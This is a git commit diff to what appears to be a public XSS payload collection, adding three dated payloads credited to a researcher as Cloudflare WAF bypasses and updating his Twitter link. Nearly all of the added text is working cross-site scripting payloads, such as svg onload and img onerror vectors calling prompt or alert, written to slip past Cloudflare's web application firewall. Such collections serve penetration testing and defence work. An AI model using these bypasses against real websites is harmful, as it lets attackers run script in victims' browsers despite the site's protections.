Update Cloudflare XSS bypasses

Add 3 bypasses by Bohdan Korzhynskyi. Update twitter
This commit is contained in:
bohdansec 2020-04-22 00:51:36 +03:00 committed by GitHub
parent 2615968e96
commit c4af354d8f
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -975,7 +975,27 @@ Works for CSP like `script-src 'self' data:`
## Common WAF Bypass ## Common WAF Bypass
### Cloudflare XSS Bypasses by [@Bohdan Korzhynskyi](https://twitter.com/h1_ragnar) - 3rd june 2019 ### Cloudflare XSS Bypasses by [@Bohdan Korzhynskyi](https://twitter.com/bohdansec)
#### 21st april 2020
```html
<svg/OnLoad="`${prompt``}`">
```
#### 22nd august 2019
```html
<svg/onload=%26nbsp;alert`bohdan`+
```
#### 5th jule 2019
```html
1'"><img/src/onerror=.1|alert``>
```
#### 3rd june 2019
```html ```html
<svg onload=prompt%26%230000000040document.domain)> <svg onload=prompt%26%230000000040document.domain)>